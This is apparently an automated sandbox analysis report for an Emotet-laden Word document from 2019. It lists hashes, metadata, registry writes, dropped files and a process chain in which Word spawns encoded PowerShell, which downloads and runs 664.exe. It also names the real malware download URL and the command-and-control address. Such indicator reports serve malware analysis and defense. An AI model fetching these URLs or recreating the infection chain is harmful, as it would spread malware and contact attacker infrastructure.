Field | Value
---|---
File name | Doc 543228 318165.doc
Full analysis | https://app.any.run/tasks/6332fdfb-a70b-44ea-b7d5-42ab43bd3cec
Verdict | Malicious activity
Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims, but even private users get infected in mass spam email campaigns.
Analysis date | May 15, 2019, 14:29:24
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | —
Indicators | —
MIME | application/msword
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Movies, Subject: Roads, Author: Lempi Greenholt, Comments: seamless, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue May 14 23:43:00 2019, Last Saved Time/Date: Tue May 14 23:43:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 169, Security: 0
MD5 | F0B8D0083EFDF5162118FFB7AC7A6944
SHA1 | 384BB6E06691E48AA3CEA3D76EC4EC7DF7B24E8D
SHA256 | EDD7683434BF4B5DCF6E62052C0D260F9CE2824BCD2E7FC527680DC96CF84FA0
SSDEEP | 3072:m77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qE6Q0DyRv7nG5osJ:m77HUUUUUUUUUUUUUUUUUUUT52VWxDyC
Extension | Type
---|---
.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)
Field | Value
---|---
Manager | Zemlak
HeadingPairs | -
TitleOfParts | -
HyperlinksChanged | No
SharedDoc | No
LinksUpToDate | No
ScaleCrop | No
AppVersion | 16
CharCountWithSpaces | 197
Paragraphs | 1
Lines | 1
Company | Bednar and Sons
CodePage | Windows Latin 1 (Western European)
Security | None
Characters | 169
Words | 29
Pages | 1
ModifyDate | 2019:05:14 22:43:00
CreateDate | 2019:05:14 22:43:00
TotalEditTime | -
Software | Microsoft Office Word
RevisionNumber | 1
LastModifiedBy | -
Template | Normal.dotm
Comments | seamless
Keywords | -
Author | Lempi Greenholt
Subject | Roads
Title | Movies
CompObjUserType | Microsoft Word 97-2003 Document
CompObjUserTypeLen | 32
PID | CMD | Path | Indicators | Parent process | User | Company | Integrity level | Description | Exit code | Version
---|---|---|---|---|---|---|---|---|---|---
3516 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Doc 543228 318165.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Microsoft Word | | 14.0.6024.1000
3264 | powershell -enc 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 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | wmiprvse.exe | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 0 | 6.1.7600.16385 (win7_rtm.090713-1255)
1668 | "C:\Users\admin\664.exe" | C:\Users\admin\664.exe | — | powershell.exe | admin | Lovelysoft | MEDIUM | Process Manager Remote Server | 0 | 1.8.0.1800
3524 | --43274a32 | C:\Users\admin\664.exe | | 664.exe | admin | Lovelysoft | MEDIUM | Process Manager Remote Server | 0 | 1.8.0.1800
480 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | | 664.exe | admin | Lovelysoft | MEDIUM | Process Manager Remote Server | 0 | 1.8.0.1800
3360 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | | soundser.exe | admin | Lovelysoft | MEDIUM | Process Manager Remote Server | | 1.8.0.1800
PID | Process | Key | Operation | Name | Value
---|---|---|---|---|---
3516 | WINWORD.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | write | #23 | 23323300BC0D0000010000000000000000000000
3516 | WINWORD.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1033 | Off
3516 | WINWORD.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1033 | On
3516 | WINWORD.EXE | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | write | WORDFiles | 1320091678
3516 | WINWORD.EXE | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | write | ProductFiles | 1320091792
3516 | WINWORD.EXE | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | write | ProductFiles | 1320091793
3516 | WINWORD.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | write | MTTT | BC0D00007294BEA12A0BD50100000000
3516 | WINWORD.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | write | {33 | 7B333300BC0D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
3516 | WINWORD.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | delete value | {33 | 7B333300BC0D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
3516 | WINWORD.EXE | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | UNCAsIntranet | 0
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3E83.tmp.cvr | — | — | —
3264 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KL882AJCUZRYIXIWK652.temp | — | — | —
3516 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | B19FF5CEFD1DA5D0F2805A945B570C3C | F75A592B67565D406D9D7F15EC8C276CD6D0D5E54AD5EF87413F565E44175FC9
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | D6BF4FAF982B5B9431C430AAC93FD17D | 75CDB1F173A92EB059A3EA92CF907A30DD00949E68C64361AE63DF8D59AE8C2E
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B99C965F.wmf | wmf | 6C084890B480DB70236D24F9173266F8 | 387BDF462DC95406765887749796394F79699585ACCFC1042133D2E42B23BAD7
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\73C21769.wmf | wmf | C718CAE0782EDD9BF31F683ED68F4ADC | 238E7C54D90814ECE916828A360FCE7DB2186A677F9954FA62DBFB589DAF8227
3264 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7767C308.wmf | wmf | 9B65CF0D4A58398412C8EC8D16152AA9 | 8CE15822FFCF829484971BBBD8086F328535E55B3EC81398441956D8C82A7E39
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F700656.wmf | wmf | A555A7CB5733868AD7EEDB061FD43C37 | 29D5A5AE1396648E98E596559EC05365D60736A401A74DE906002F23298B7F0A
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F6BFE02.wmf | wmf | 229F6121176F5A508C8BE5B6378D66E0 | C282B57D0D3D54E29F88B682055383F30A79ECFB535BEB57B9794A33D8A410A0
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3264 | powershell.exe | GET | 200 | 111.68.113.243:80 | http://angelyosh.com/andreaputriana.online/QSSVHkBY/ | ID | executable | 171 Kb | suspicious |
3360 | soundser.exe | POST | — | 90.57.69.215:80 | http://90.57.69.215/schema/json/ringin/merge/ | FR | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3264 | powershell.exe | 111.68.113.243:80 | angelyosh.com | Varnion Technology Semesta, PT | ID | suspicious |
3360 | soundser.exe | 90.57.69.215:80 | — | Orange | FR | malicious |
Domain | IP | Reputation
---|---|---
angelyosh.com | 111.68.113.243 | suspicious